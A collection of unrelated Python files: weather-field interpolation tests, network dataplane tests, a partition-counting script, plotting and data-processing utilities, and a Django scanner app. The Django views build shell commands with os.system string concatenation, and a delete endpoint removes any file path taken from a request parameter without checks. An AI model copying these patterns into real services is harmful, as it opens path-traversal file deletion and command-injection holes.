def test_maximum_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the maximum limit if they exceed it."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.0, 6.0], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit, limit_as_maximum=True
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
def test_minimum_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the minimum limit if they are below it."""
expected = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit, limit_as_maximum=False
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
def test_multi_realization_limited(self):
"""Test interpolation to complete an incomplete field using a reference
field. A limit is imposed upon the returned interpolated values,
forcing these values to the minimum limit if they are below it. The
inputs are multi-realization."""
snow_sleet = add_coordinate(self.snow_sleet, [0, 1], "realization")
sleet_rain = add_coordinate(self.sleet_rain, [0, 1], "realization")
expected = np.array(
[[4.0, 4.0, 4.0], [10.0, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(
sleet_rain, snow_sleet, limit=self.limit, limit_as_maximum=False
)
assert_array_equal(result[0].data, expected)
assert_array_equal(result[1].data, expected)
self.assertEqual(result.shape, sleet_rain.shape)
self.assertEqual(result.coords(), sleet_rain.coords())
self.assertEqual(result.metadata, sleet_rain.metadata)
def test_crossing_values(self):
"""Test interpolation when the reference field and field to be
completed by interpolation cross one another. In the absence of any
limit it should be possible to return an interpolated field of values
that pass through the reference field in an expected way. In another
case we apply the reference field as a lower bound to the interpolated
values."""
snow_sleet = np.array(
[[15.0, 15.0, 15.0], [10.0, 10.0, 10.0], [8.0, 8.0, 8.0]], dtype=np.float32
)
sleet_rain = np.array(
[[5.0, 5.0, 5.0], [np.nan, np.nan, np.nan], [15.0, 15.0, 15.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
self.snow_sleet.data = snow_sleet
self.sleet_rain.data = sleet_rain
expected_unlimited = np.array(
[[5.0, 5.0, 5.0], [8.5, 8.5, 8.5], [15.0, 15.0, 15.0]], dtype=np.float32
)
expected_limited = np.array(
[[5.0, 5.0, 5.0], [10.0, 10.0, 10.0], [15.0, 15.0, 15.0]], dtype=np.float32
)
result_unlimited = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet
)
result_limited = InterpolateUsingDifference().process(
self.sleet_rain,
self.snow_sleet,
limit=self.snow_sleet,
limit_as_maximum=False,
)
assert_array_equal(result_unlimited.data, expected_unlimited)
assert_array_equal(result_limited.data, expected_limited)
def test_linear_failure(self):
"""Test that if the use of linear interpolation does not result in a
complete difference field, and thus a complete field of interest, the
secondary use of nearest neighbour interpolation completes the
field."""
sleet_rain = np.array(
[[np.nan, np.nan, 4.0], [np.nan, np.nan, np.nan], [3.0, 3.0, 3.0]],
dtype=np.float32,
)
sleet_rain = np.ma.masked_invalid(sleet_rain)
self.sleet_rain.data = sleet_rain
expected = np.array(
[[3.5, 4.0, 4.0], [8.5, 8.5, 8.5], [3.0, 3.0, 3.0]], dtype=np.float32
)
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
@ManageWarnings(record=True)
def test_unmasked_input_cube(self, warning_list=None):
"""Test a warning is raised if the input cube is not masked and that
the input cube is returned unchanged."""
self.sleet_rain.data = np.ones((3, 3), dtype=np.float32)
expected = self.sleet_rain.copy()
warning_msg = "Input cube unmasked, no data to fill in, returning"
result = InterpolateUsingDifference().process(self.sleet_rain, self.snow_sleet)
self.assertEqual(result, expected)
self.assertTrue(any(item.category == UserWarning for item in warning_list))
self.assertTrue(any(warning_msg in str(item) for item in warning_list))
def test_convert_units(self):
"""Test that a reference cube and limit cube with different but
compatible units are converted for use and return the expected
result."""
expected = np.array(
[[4.0, 4.0, 4.0], [8.5, 8.0, 6.0], [3.0, 3.0, 3.0]], dtype=np.float32
)
self.snow_sleet.convert_units("cm")
self.limit.convert_units("cm")
result = InterpolateUsingDifference().process(
self.sleet_rain, self.snow_sleet, limit=self.limit
)
assert_array_equal(result.data, expected)
self.assertEqual(result.coords(), self.sleet_rain.coords())
self.assertEqual(result.metadata, self.sleet_rain.metadata)
if __name__ == "__main__":
unittest.main()
|
import ptf
from ptf.base_tests import BaseTest
from ptf.mask import Mask
from ptf import config
import ptf.testutils as testutils
class DataplaneBaseTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
def tearDown(self):
if config["log_dir"] != None:
self.dataplane.stop_pcap()
class OneTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
class GetMacTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
def check_mac(device, port):
mac = self.dataplane.get_mac(device, port)
self.assertIsNotNone(mac)
self.assertEqual(mac.decode().count(":"), 5)
check_mac(0, 1)
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
check_mac(1, 1)
class GetCountersTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
def check_counters(device, port):
counters = self.dataplane.get_nn_counters(device, port)
self.assertIsNotNone(counters)
self.assertTrue(type(counters) is tuple)
self.assertEqual(len(counters), 2)
return counters
counters_01_b = check_counters(0, 1)
counters_11_b = check_counters(1, 1)
print("Counters:")
print(" (0, 1) %d:%d" % counters_01_b)
print(" (1, 1) %d:%d" % counters_11_b)
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
counters_01_e = check_counters(0, 1)
counters_11_e = check_counters(1, 1)
print("Counters:")
print(" (0, 1) %d:%d" % counters_01_e)
print(" (1, 1) %d:%d" % counters_11_e)
self.assertTrue(counters_01_e[1] > counters_01_b[1])
self.assertTrue(counters_11_e[0] > counters_11_b[0])
class VerifyAnyPacketAnyPort(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_any_packet_any_port(
self, pkts=[pkt], ports=[3, 1], device_number=1)
# negative test: if the packet is indeed received, but not on one of the
# expected ports, the test should fail
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_any_packet_any_port(
self, pkts=[pkt], ports=[0, 2, 3], device_number=1)
print("Verify masked packets")
pkt1 = testutils.simple_udp_packet(eth_dst="00:11:11:11:11:11")
pkt2 = testutils.simple_udp_packet(eth_dst="00:22:22:22:22:22")
exp_pkt = Mask(pkt2)
exp_pkt.set_do_not_care_scapy(Ether, 'dst')
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# pkt2 will not be received
# pkt2 with masked eth_dst field will match
testutils.verify_any_packet_any_port(
self, pkts=[pkt2, exp_pkt], ports=[0, 1], device_number=1)
# negative tests
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# incorrect ports
testutils.verify_any_packet_any_port(
self, pkts=[exp_pkt], ports=[0, 2, 3], device_number=1)
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
print("Packet sent")
# incorrect packet
testutils.verify_any_packet_any_port(
self, pkts=[pkt2], ports=[0, 1], device_number=1)
class RemovePort(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt = "ab" * 20
pkt = pkt.encode()
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
# We remove a port to test port_remove, but in order to execute
# subsequent tests, we need to make sure we re-add the port
# afterwards. In order to re-add the port, we need the interface name,
# which is what this method is for. This is a little hacky but fine for
# testing. In practice, you would not be removing ports which are part
# of the original ptf config.
def find_ifname(device_number, port_number):
for port_id, ifname in config["port_map"].items():
if (device_number, port_number) == port_id:
return ifname
ifname = find_ifname(1, 1)
self.assertTrue(self.dataplane.port_remove(1, 1))
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_no_other_packets(self, device_number=1)
self.dataplane.port_add(ifname, 1, 1)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleTcpPacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 400
pkt = testutils.simple_tcp_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleIpv4PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 70
pkt = testutils.simple_ipv4ip_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class SimpleIpv6PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 400
pkt = testutils.simple_ipv6ip_packet(pktlen=pktlen)
self.assertEqual(len(pkt), pktlen)
testutils.send_packet(self, (0, 1), pkt)
print("packet sent")
testutils.verify_packet(self, pkt, (1, 1))
testutils.verify_no_other_packets(self, 1)
class Ipv4InIpv4PacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 70
pkt = testutils.simple_ipv4ip_packet(pktlen=pktlen)
pkt2 = testutils.simple_ipv4ip_packet(pktlen=pktlen, inner_frame=pkt["IP"])
testutils.send_packet(self, (0, 1), pkt2)
print("packet sent")
testutils.verify_packet(self, pkt2, (1, 1))
testutils.verify_no_other_packets(self, 1)
class Ipv6InGREPacketTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pktlen = 1000
udp = testutils.simple_udp_packet()
ipv6 = testutils.simple_ipv6ip_packet(inner_frame=udp['UDP'])
gre = testutils.simple_grev6_packet(pktlen=pktlen, inner_frame=ipv6["IPv6"])
self.assertEqual(gre['GRE'].proto, 0x86DD)
testutils.send_packet(self, (0, 1), gre)
print("packet sent")
testutils.verify_packet(self, gre, (1, 1))
testutils.verify_no_other_packets(self, 1)
class VerifyPacketsOnMultiplePortListsTest(DataplaneBaseTest):
def __init__(self):
DataplaneBaseTest.__init__(self)
def runTest(self):
pkt1 = testutils.simple_udp_packet(eth_dst="00:11:11:11:11:11")
pkt2 = testutils.simple_udp_packet(eth_dst="00:22:22:22:22:22")
testutils.send_packet(self, (0, 1), pkt1)
testutils.send_packet(self, (0, 1), pkt2)
print("Packets sent")
# pkt1 will be received on one of ports (0, 1)
# pkt2 will be received on one of ports (1, 2, 3)
testutils.verify_each_packet_on_multiple_port_lists(
self, pkts=[pkt1, pkt2], ports=[[0, 1], [1, 2, 3]], device_number=1)
# negative test
with self.assertRaises(AssertionError):
testutils.send_packet(self, (0, 1), pkt1)
testutils.send_packet(self, (0, 1), pkt2)
print("Packets sent")
# pkt1 will not be received on one of ports (0, 2, 3)
# pkt1 will not be received on one of ports (1, 2, 3); it will be pkt2
testutils.verify_each_packet_on_multiple_port_lists(
self, pkts=[pkt1, pkt1], ports=[[0, 2, 3], [0, 1]],
device_number=1)
|
#!/usr/bin/env python3
import lib
N=1_000_000
MX=1000
def partition2(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
# dynamic programming table, table cell (i,j), parition size = i + 1, target n = i + 1, cell value = partition(n)
dp = {} # using dict as dynamic programming table is really slow
for i in range(n):
dp[(0,i)] = 1 # One way to partition any n using piles of size 1
dp[(i,0)] = 1 # One way to partition n=1
for i in range(1,n):
for j in range(1,n):
value = dp[(i-1,j)] # Include ways to partition n using piles <i
if i == j:
value += 1 # One way to make n using piles of the same size
elif j > i:
value += dp[(i,j-i-1)] # Include ways to make j-i using piles of size <i
dp[(i,j)] = value
if i == j:
print(i+1,value)
if value % N == 0:
print('result',i+1,value)
return value
return dp[(n-1,n-1)]
def partition1(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
# dynamic programming table, table cell (i,j), parition size = i + 1, target n = i + 1, cell value = partition(n)
dp = [[0]*n for i in range(n)]
for i in range(n):
dp[0][i] = 1 # One way to partition any n using piles of size 1
dp[i][0] = 1 # One way to partition n=1
for i in range(1,n):
for j in range(1,n):
value = dp[i-1][j] # Include ways to partition n using piles <i
if i == j:
value += 1 # One way to make n using piles of the same size
elif j > i:
value += dp[i][j-i-1] # Include ways to make j-i using piles of size <i
dp[i][j] = value % N
if i == j:
if i%100 == 0: print(i+1,value)
if value % N == 0:
print('result',i+1,value)
return value
return dp[n-1][n-1]
def partition3(n):
""" Coin partitions. Let partition(n) represent the number of different ways in which n coins can be separated into piles.
For example, five coins can be separated into piles in exactly seven different ways, so partition(5)=7. """
# dynamic programming table
# p(n) = p(n - gpenta(1)) + p(n - gpenta(2)) - p(n - gepenta(3)) - p(n - gpenta(4)) ...
dp = [0]*(n+1)
dp[0] = 1
for i in range(1,n+1):
penta = 1
value = 0
k = 0
while i-lib.gpentagonal(penta) >= 0:
sign = 1 if k < 2 else -1
value += sign * dp[i-lib.gpentagonal(penta)]
penta += 1
k = (k + 1) % 4
dp[i] = value % N
if dp[i] % N == 0:
print(' solution',i,dp[i])
return dp[i]
return dp[n]
for i in range(1,10):
if partition1(i) != partition3(i):
print (i,partition3(i),'should be',partition1(i))
#lib.print2d(partition(5),rows=range(1,6),cols=range(1,6))
print(partition3(100000))
|
# imports
import matplotlib.pyplot as plt
import numpy as np
import os
# load log files
files = [os.path.join('log', file) for file in os.listdir('./log/')
if file.endswith('.bin')]
files = [file for file in files if os.path.isfile(file)]
linestyles = ['-', '--', '-.']
colorwheel = ['r', 'g', 'b', 'k']
# load data
for i, file in enumerate(files):
arr = np.fromfile(file)
# reshape matrix (nsteps x 15)
arr = np.reshape(arr, (-1, 15))
# get the solver name
label = file.split('-')[0]
label = label[label.index('/') + 1:]
label += '-GPU' if 'gpu' in file else ''
# plot Temperature
plt.plot(arr[:, 0], arr[:, 1],
linestyle=linestyles[i % len(linestyles)],
label=label, color=colorwheel[i % len(colorwheel)])
# make legend
plt.legend(loc=0)
# title and labels
plt.title('H2/CO Constant Pressure Ignition')
plt.xlabel('Time(s)')
plt.ylabel('Temerature (K)')
# and save fig
plt.savefig('h2ign.png', dpi=300, size=(5, 3))
|
from django.shortcuts import render
from django.http import HttpResponse
import subprocess
import re
import random
import string
import time
import os
'''
For this code to work:
1) The user running the web server (www-data) must be in the group lp.
2) The command scanimage -L must be available.
'''
# Constants
SCAN_DIR = '/mnt/raid/scanner/'
def show(request):
return render(request, 'scanner/index.html')
def scannerList(request):
cmdOut = subprocess.Popen(['scanimage', '-L'], stdout = subprocess.PIPE).communicate()[0]
ret = 'None'
listOfMatches = re.findall('device\s.(.+).\sis\sa\s.+$', cmdOut)
# listOfMatches = re.findall('device\s.+\sis\sa\s(.+)$', cmdOut)
if (len(listOfMatches) > 0):
ret = '\n'.join(listOfMatches)
return HttpResponse(ret)
def scan(request):
scannerProvided = request.GET.get('s', 'error')
# If the scanner is not valid we do not do anything
valid = False
cmdOut = subprocess.Popen(['scanimage', '-L'], stdout = subprocess.PIPE).communicate()[0]
listOfMatches = re.findall('device\s.(.+).\sis\sa\s.+$', cmdOut)
for match in listOfMatches:
if (scannerProvided == match):
valid = True
break
if (not valid):
return HttpResponse('ERROR')
# Now that we know that the name of the scanner provided is valid, we can scan
#cmdOut = subprocess.Popen(['scanimage', '--resolution=300', '-d', scannerProvided], stdout = subprocess.PIPE).communicate()[0]
# Writing image to file
randstr = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(10)])
filePath = '/tmp/' + randstr + '.ppm'
#f = open(filePath, 'w')
#f.write(cmdOut)
#f.close()
os.system('scanimage --resolution=300 -d \'' + scannerProvided + '\' > ' + filePath)
# Converting image in PPM format to JPG
newFilePath = SCAN_DIR + time.strftime("%a %d %b %Y - %H:%M:%S") + '.jpg'
#subprocess.Popen(['convert', '-quality', '60', filePath, newFilePath], stdout = subprocess.PIPE).communicate()[0]
os.system('convert -quality 60 \'' + filePath + '\' \'' + newFilePath + '\'')
os.remove(filePath)
return HttpResponse('OK')
def deletePicture(request):
picture = SCAN_DIR + request.GET.get('p', 'error')
if (os.path.isfile(picture)):
os.remove(picture)
return HttpResponse('OK')
else:
return HttpResponse('ERROR')
|
import pytest
from py_cdk_utils import DeployEnv, get_config
test_default = "default"
test_overrides = {DeployEnv.DEV: "dev val", DeployEnv.LOCAL: "local val"}
def test_no_args():
with pytest.raises(TypeError):
get_config()
def test_default_value():
with pytest.raises(TypeError):
get_config(default_value="test")
def test_override_only():
with pytest.raises(TypeError):
get_config({DeployEnv.DEV: "dev value"})
def test_valid_multiple_overrides_none_qualify(mocker):
mocker.patch("py_cdk_utils.environments.deploy_env", DeployEnv.PROD)
assert get_config(test_default, test_overrides) == test_default
def test_valid_multiple_one_qualifies(mocker):
mocker.patch("py_cdk_utils.environments.deploy_env", DeployEnv.DEV)
assert get_config(test_default, test_overrides) == "dev val"
|
import pandas as pd
import gspread
import os
import requests
from oauth2client.service_account import ServiceAccountCredentials
def connect_to_twitter():
bearer_token = os.environ.get("BEARER_TOKEN")
return {"Authorization": "Bearer {}".format(bearer_token)}
def make_request(headers):
url = "https://api.twitter.com/2/tweets"
params = {
"tweet.fields": "author_id,created_at,lang",
"ids": "21,1293593516040269825,1334542969530183683",
}
return requests.request("GET", url, headers=headers, params=params).json()
def make_df(response):
return pd.DataFrame(response["data"])
def authenticate_to_google():
scope = ["https://spreadsheets.google.com/feeds"]
credentials = ServiceAccountCredentials.from_json_keyfile_name(
"/path/to/your/file.json", scope
)
return credentials
def main():
headers = connect_to_twitter()
response = make_request(headers)
df = make_df(response)
credentials = authenticate_to_google()
gc = gspread.authorize(credentials)
workbook = gc.open_by_key("spreadsheet_id")
sheet = workbook.worksheet("Sheet1")
sheet.update("A1", [df.columns.values.tolist()] + df.values.tolist())
if __name__ == "__main__":
main()
|
import numpy as np
import xarray as xr
import pandas as pd
from xgcm import Grid
WRF_NEW_DIMS = {'south_north': 'y_c', 'south_north_stag': 'y_g',
'west_east': 'x_c', 'west_east_stag': 'x_g'}
WRF_NEW_COORDS = {'XLONG_M': 'lon_T', 'XLAT_M': 'lat_T',
'XLONG_U': 'lon_U', 'XLAT_U': 'lat_U',
'XLONG_V': 'lon_V', 'XLAT_V': 'lat_V'}
WRF_NEW_MESH = {'F': 'f_T'}
WRF_NEW_MASK = {'LANDMASK': 'mask_T'}
def dlondlat_dxdy(dlon, dlat, lon, lat):
EARTH_RADIUS = 6371 * 1000
dx = np.cos(np.pi / 180. * lat) * np.pi / 180. * EARTH_RADIUS * dlon
dy = (lon * 0 + 1) * np.pi / 180. * EARTH_RADIUS * dlat
return dx, dy
def read_mask(file):
original_mesh = xr.open_dataset(file).squeeze()
mask = original_mesh[list(WRF_NEW_MASK)].rename(WRF_NEW_MASK)
coords = original_mesh[list(WRF_NEW_COORDS)].rename(WRF_NEW_COORDS)
mask = mask.assign_coords(coords).rename_dims(WRF_NEW_DIMS)
return mask
def read_mesh(file):
original_mesh = xr.open_dataset(file).squeeze()
mesh = original_mesh[list(WRF_NEW_MESH)].rename(WRF_NEW_MESH)
coords = original_mesh[list(WRF_NEW_COORDS)].rename(WRF_NEW_COORDS)
mesh = mesh.assign_coords(coords).rename_dims(WRF_NEW_DIMS)
mesh = mesh.isel(x_g=slice(None, -1), y_g=slice(None, -1))
xgrid = build_xgrid(mesh)
lon_F = xgrid.interp(mesh.lon_U, 'Y', boundary='fill', fill_value=np.nan)
lat_F = xgrid.interp(mesh.lat_V, 'X', boundary='fill', fill_value=np.nan)
mesh = mesh.assign_coords(lon_F=lon_F, lat_F=lat_F)
dlon_T = xgrid.diff(mesh.lon_U, 'X', boundary='fill', fill_value=np.nan)
dlon_U = xgrid.diff(mesh.lon_T, 'X', boundary='fill', fill_value=np.nan)
dlon_V = xgrid.diff(mesh.lon_F, 'X', boundary='fill', fill_value=np.nan)
dlon_F = xgrid.diff(mesh.lon_V, 'X', boundary='fill', fill_value=np.nan)
dlat_T = xgrid.diff(mesh.lat_V, 'Y', boundary='fill', fill_value=np.nan)
dlat_U = xgrid.diff(mesh.lat_F, 'Y', boundary='fill', fill_value=np.nan)
dlat_V = xgrid.diff(mesh.lat_T, 'Y', boundary='fill', fill_value=np.nan)
dlat_F = xgrid.diff(mesh.lat_U, 'Y', boundary='fill', fill_value=np.nan)
dx_T, dy_T = dlondlat_dxdy(dlon_T, dlat_T, mesh.lon_T, mesh.lat_T)
dx_U, dy_U = dlondlat_dxdy(dlon_U, dlat_U, mesh.lon_U, mesh.lat_U)
dx_V, dy_V = dlondlat_dxdy(dlon_V, dlat_V, mesh.lon_V, mesh.lat_V)
dx_F, dy_F = dlondlat_dxdy(dlon_F, dlat_F, mesh.lon_F, mesh.lat_F)
mesh = mesh.assign_coords(dx_T=dx_T, dy_T=dy_T, dx_U=dx_U, dy_U=dy_U,
dx_V=dx_V, dy_V=dy_V, dx_F=dx_F, dy_F=dy_F)
return mesh
def rename_dims(ds):
ds = ds.rename_dims(WRF_NEW_DIMS)
return ds
def rename_coords_and_dims(ds, grid='T'):
ds = ds.rename(WRF_NEW_COORDS).rename(WRF_NEW_DIMS)
return ds
def open_netcdf_dataset(files, mesh_file=None, grid='T', variables=None,
**kwargs):
ds = xr.open_mfdataset(files, concat_dim='Time', combine='nested',
drop_variables=['XLON', 'XLAT'], **kwargs)
ds = ds.rename_dims(WRF_NEW_DIMS)
ds = ds.isel(x_g=slice(None, -1), y_g=slice(None, -1))
time = pd.to_datetime(ds.Times.load().astype('str').data,
format='%Y-%m-%d_%H:%M:%S')
ds = ds.assign_coords(Time=time).rename({'Time': 'time'})
mesh = read_mesh(mesh_file)
ds = ds.assign_coords(mesh.variables)
if variables is not None:
ds = ds[variables]
return ds
def build_xgrid(ds, periodic=False, metric=None):
xgrid = Grid(ds, periodic=periodic,
coords={'X': {'center': 'x_c', 'left': 'x_g'},
'Y': {'center': 'y_c', 'left': 'y_g'}})
return xgrid
|
from .admin_controller import AdminController, add_admin_handler
__all__ = ['AdminController', 'add_admin_handler']
|
'''
python3 + numpy routine to calculate magnetic curvature from MMS data.
Uses pyspedas for MMS data file loading
*****************************************************************************
Example script for loading required data and calculating the curvature vector:
import time
import re
import numpy as np
from mms_curvature import DataLoad, mms_Grad, mms_Curvature
timeStart = time.strftime("%H:%M:%S", time.localtime())
print("Files Loading:")
data,metadata = DataLoad(trange=['2017-05-04', '2017-05-05'])
postimes = [data['mec'][n]['x'] for n in data['mec'] if re.compile('mms\d_mec_r_gsm_srvy_l2').match(n)]
posvalues = [data['mec'][n]['y'] for n in data['mec'] if re.compile('mms\d_mec_r_gsm_srvy_l2').match(n)]
magtimes = [data['fgm'][n]['x'] for n in data['fgm'] if re.compile('mms\d_fgm_b_gsm_srvy_l2').match(n)]
magvalues = [data['fgm'][n]['y'] for n in data['fgm'] if re.compile('mms\d_fgm_b_gsm_srvy_l2').match(n)]
print("Time started: ", timeStart)
print("Time Loaded: ", time.strftime("%H:%M:%S", time.localtime()))
grad_Harvey, bm, bmag, rm, t_master = mms_Grad(postimes, posvalues, magtimes, magvalues)
curve_Harvey = mms_Curvature(grad_Harvey, bm)
np.savetxt("t_master.csv", t_master, delimiter=",")
np.savetxt("curve_Harvey.csv", curve_Harvey, delimiter=",")
np.save("grad_Harvey.npy", grad_Harvey)
# end
****************************************************************************
---TJR 10.09.2020
NOTE: Need to update the docstring for mms_Grad after refactoring
'''
import numpy as np
def mms_Grad(postimes=None, posvalues=None, magtimes=None, magvalues=None, normalize=True):
'''
Calculates spacial gradient and curvature vector of the magnetic field.
Returns those and the master time (interpolated from FGM data) as numpy arrays
normalize: if True normalizes magnetic field vectors before continusing
calculation; required for calculating curvature
if False leaves magnetic field as full vector with magnitude;
required for calculating curl and divergence
'''
# Number of spacecraft in inputs. Assumed from number of position time arrays.
numBirds = len(postimes)
# Sanity check. Throw an error if number of time arrays and data arrays don't all match.
if len(posvalues) != numBirds: raise ValueError('Number of position value arrays does not match number of position time arrays!')
if len(magtimes) != numBirds: raise ValueError('Number of magnetic field time arrays does not match number of position time arrays!')
if len(magvalues) != numBirds: raise ValueError('Number of magnetic field value arrays does not match number of position time arrays!')
bn = [None]*numBirds
if normalize:
# normalize magnetic fields
if magvalues[0].shape[-1] == 4: # tests for |B| given as 4th vector in data
for bird in range(numBirds):
bn[bird] = magvalues[bird][:,0:3]/magvalues[bird][:,3,np.newaxis]
else:
for bird in range(numBirds): # else calculates |B| from the 3-vector given
bn[bird] = magvalues[bird]/np.linalg.norm(magvalues[bird], axis=1).reshape(magvalues[bird].shape[0], 1)
else:
# use magnetic fields without normalizing
for bird in range(numBirds):
bn[bird] = magvalues[bird][:,0:3]
# find probe with latest beginning point for magnetic field data
firsttimes = []
lasttimes = []
for bird in range(numBirds):
firsttimes.append(magtimes[bird][0])
lasttimes.append(magtimes[bird][-1])
mastersc = np.argmax(firsttimes)
# find earliest end time for all space craft in range
tend = min(lasttimes)
tend_i = 0 # initialize counting index for finding ending index for master S/C
# initialize master time sequence by trimming time from last S/C to start (mastersc)
while magtimes[mastersc][tend_i] < tend: tend_i += 1
t_master = magtimes[mastersc][0:(tend_i+1)]
# master mag field data arr, with interpolated values
# Magnetic field data, interpolated to the previously determined master time sequence
barr=np.ndarray((numBirds,t_master.shape[0],3))
for bird in range(numBirds):
barr[bird,:,0] = np.interp(t_master, magtimes[bird], bn[bird][:,0])
barr[bird,:,1] = np.interp(t_master, magtimes[bird], bn[bird][:,1])
barr[bird,:,2] = np.interp(t_master, magtimes[bird], bn[bird][:,2])
# Calculate average |B| for export
Bvals = [None]*numBirds
if magvalues[0].shape[-1] == 4: # tests for |B| given as 4th vector in data
for bird in range(numBirds):
Bvals[bird] = np.interp(t_master, magtimes[bird], magvalues[bird][:,3])
else:
for bird in range(numBirds): # else calculates |B| from the 3-vector given
Bvals[bird] = np.interp(t_master, magtimes[bird], np.linalg.norm(magvalues[bird], axis=1))
bmag = np.average(Bvals, axis=0)
# master position data array, with interpolated value
# Spacecraft position data, interpolated to the previously determined master time sequence
rarr = np.ndarray((numBirds,t_master.shape[0],3))
for bird in range(numBirds):
rarr[bird,:,0] = np.interp(t_master, postimes[bird], posvalues[bird][:,0])
rarr[bird,:,1] = np.interp(t_master, postimes[bird], posvalues[bird][:,1])
rarr[bird,:,2] = np.interp(t_master, postimes[bird], posvalues[bird][:,2])
# Now all magnetic fields and positional data are of the same cadence and at the same times for each index
# Indices are: [s/c(0=mms1, 1=mms2, 2=mms3, 3=mms4), time_step, vector(0=x, 1=y, 2=z)]
# ie. rarr[<spacecraft>, <timestep_index>, <cartesian_component_of_vector>]
# eg. Y-position of mms4 at first time step: rarr[3,0,1]
# calculate position and magnetic field at mesocenter of the fleet
# Commenting old implementation
#rm = np.ndarray((t_master.shape[0], 3))
#for i in range(t_master.shape[0]): # populate each element of the mesocenter with the average across all four s/c
# for j in range(3): # there's got to be a way to vectorize this
# #print("rm:", rm.shape, "rarr:", rarr.shape)
# rm[i,j] = (1./4.)*(rarr[0,i,j]+rarr[1,i,j]+rarr[2,i,j]+rarr[3,i,j])
#
#bm = np.ndarray((t_master.shape[0], 3))
#for i in range(t_master.shape[0]): # populate each element of the mesocenter with the average across all four s/c
# for j in range(3): # there's got to be a way to vectorize this
# bm[i,j] = (1./4.)*(barr[0,i,j]+barr[1,i,j]+barr[2,i,j]+barr[3,i,j])
# End of old implementation.
# Vectorized version of above, using numpy built-in ufuncs.
# - inner operation `np.add.reduce(input, axis=0)`: .reduce collapses the input array along the specified
# axis (0 by default), using the prefaced ufunc (add) to merge array values.
# Layman's version: Add up the respective coordinate components from each bird.
# - outer operation `np.divide(input1,input2)`: Divides each element in input1 by the respective element
# in input 2. If input2 is of lesser dimensions than input1, input2 will be expanded/broadcast to fit.
# Layman's version: Divide each component of the inner results by the number of birds.
rm = np.divide(np.add.reduce(rarr),rarr.shape[0])
bm = np.divide(np.add.reduce(barr),barr.shape[0])
# Calculate volumetric tensor (Harvey, Ch 12.4, Eq 12.23, from "Analysis Methods for Multi-Spacecraft Data" Paschmann ed.)
## Section: old, not-actually correct code
